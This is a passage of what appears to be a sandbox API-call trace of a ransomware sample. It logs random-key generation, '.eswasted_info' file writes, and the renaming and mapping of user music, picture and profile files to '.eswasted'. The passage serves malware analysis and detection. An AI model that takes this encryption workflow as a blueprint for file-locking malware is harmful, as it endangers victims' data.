dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.202] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x721728 | out: pbBuffer=0x721728) returned 1 [0079.202] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wf2ac 3kuOVZxS87W_.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wf2ac 3kuovzxs87w_.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.203] WriteFile (in: hFile=0x108, lpBuffer=0x721728*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x721728*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.204] SetEndOfFile (hFile=0x108) returned 1 [0079.204] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.204] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.204] lstrcpyW (in: lpString1=0x6f5d3c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wf2ac 3kuOVZxS87W_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wf2ac 3kuovzxs87w_.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wf2ac 3kuOVZxS87W_.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wf2ac 3kuovzxs87w_.wav.eswasted")) returned 1 [0079.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wf2ac 3kuOVZxS87W_.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wf2ac 3kuovzxs87w_.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.205] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.208] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.209] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.209] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.210] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.210] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.210] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.268] SetEndOfFile (hFile=0x108) returned 1 [0079.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.270] CloseHandle (hObject=0x108) returned 1 [0079.272] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.272] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.273] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.273] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_Vjb3DQdgJDvz-HRhS.wav") returned 62 [0079.273] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x286) returned 0x6f5cc0 [0079.273] lstrcpyW (in: lpString1=0x6f5d3c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.273] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x721728 [0079.274] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.274] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x721728 | out: pbBuffer=0x721728) returned 1 [0079.274] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_Vjb3DQdgJDvz-HRhS.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_vjb3dqdgjdvz-hrhs.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.275] WriteFile (in: hFile=0x108, lpBuffer=0x721728*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x721728*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.276] SetEndOfFile (hFile=0x108) returned 1 [0079.277] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.277] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.277] lstrcpyW (in: lpString1=0x6f5d3c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_Vjb3DQdgJDvz-HRhS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_vjb3dqdgjdvz-hrhs.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_Vjb3DQdgJDvz-HRhS.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_vjb3dqdgjdvz-hrhs.wav.eswasted")) returned 1 [0079.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_Vjb3DQdgJDvz-HRhS.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_vjb3dqdgjdvz-hrhs.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.278] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.281] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.282] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.282] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.282] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.283] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.283] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.293] SetEndOfFile (hFile=0x108) returned 1 [0079.296] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.296] CloseHandle (hObject=0x108) returned 1 [0079.298] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.298] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.300] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.300] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.300] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0079.300] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x26c) returned 0x6f5cc0 [0079.300] lstrcpyW (in: lpString1=0x6f5d22, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.300] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x721728 [0079.300] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.301] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x721728 | out: pbBuffer=0x721728) returned 1 [0079.301] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.302] WriteFile (in: hFile=0x108, lpBuffer=0x721728*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x721728*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.303] SetEndOfFile (hFile=0x108) returned 1 [0079.303] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.304] lstrcpyW (in: lpString1=0x6f5d22, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.eswasted")) returned 0 [0079.304] GetLastError () returned 0x20 [0079.304] CloseHandle (hObject=0x108) returned 1 [0079.308] lstrcpyW (in: lpString1=0x6f5d22, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.308] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.eswasted_info")) returned 1 [0079.309] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.309] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.310] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.310] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.310] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0079.310] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2bc) returned 0x6f5cc0 [0079.311] lstrcpyW (in: lpString1=0x6f5d72, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.311] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x721728 [0079.311] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.312] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x721728 | out: pbBuffer=0x721728) returned 1 [0079.312] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.312] WriteFile (in: hFile=0x108, lpBuffer=0x721728*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x721728*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.314] SetEndOfFile (hFile=0x108) returned 1 [0079.314] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.314] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.314] lstrcpyW (in: lpString1=0x6f5d72, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted")) returned 0 [0079.361] GetLastError () returned 0x20 [0079.361] CloseHandle (hObject=0x108) returned 1 [0079.363] lstrcpyW (in: lpString1=0x6f5d72, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.363] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted_info")) returned 1 [0079.364] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.364] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.365] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.365] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.365] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7x3ykj38jZWw.png") returned 59 [0079.365] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x280) returned 0x6f5cc0 [0079.365] lstrcpyW (in: lpString1=0x6f5d36, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.365] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.365] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.366] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.366] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7x3ykj38jZWw.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7x3ykj38jzww.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.366] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.367] SetEndOfFile (hFile=0x108) returned 1 [0079.368] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.368] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.368] lstrcpyW (in: lpString1=0x6f5d36, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7x3ykj38jZWw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7x3ykj38jzww.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7x3ykj38jZWw.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7x3ykj38jzww.png.eswasted")) returned 1 [0079.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7x3ykj38jZWw.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7x3ykj38jzww.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.368] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0079.371] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.372] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.372] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.372] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.373] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.373] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.382] SetEndOfFile (hFile=0x108) returned 1 [0079.384] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.384] CloseHandle (hObject=0x108) returned 1 [0079.388] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.388] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.389] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.389] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.389] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BEtPxcb7mnhhhnVRv.png") returned 64 [0079.389] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x6f5cc0 [0079.389] lstrcpyW (in: lpString1=0x6f5d40, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.389] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.389] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.390] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.390] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BEtPxcb7mnhhhnVRv.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\betpxcb7mnhhhnvrv.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.391] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.392] SetEndOfFile (hFile=0x108) returned 1 [0079.392] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.392] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.392] lstrcpyW (in: lpString1=0x6f5d40, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.393] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BEtPxcb7mnhhhnVRv.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\betpxcb7mnhhhnvrv.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BEtPxcb7mnhhhnVRv.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\betpxcb7mnhhhnvrv.png.eswasted")) returned 1 [0079.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BEtPxcb7mnhhhnVRv.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\betpxcb7mnhhhnvrv.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0079.393] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.394] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.395] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.395] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.395] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.396] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.396] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.405] SetEndOfFile (hFile=0x108) returned 1 [0079.407] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.407] CloseHandle (hObject=0x108) returned 1 [0079.486] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.486] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.487] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.487] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cP-uWR.bmp") returned 53 [0079.487] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x274) returned 0x6f5cc0 [0079.487] lstrcpyW (in: lpString1=0x6f5d2a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.487] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x721728 [0079.487] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.488] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x721728 | out: pbBuffer=0x721728) returned 1 [0079.488] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cP-uWR.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cp-uwr.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.488] WriteFile (in: hFile=0x130, lpBuffer=0x721728*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x721728*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.490] SetEndOfFile (hFile=0x130) returned 1 [0079.490] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.490] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.490] lstrcpyW (in: lpString1=0x6f5d2a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cP-uWR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cp-uwr.bmp"), 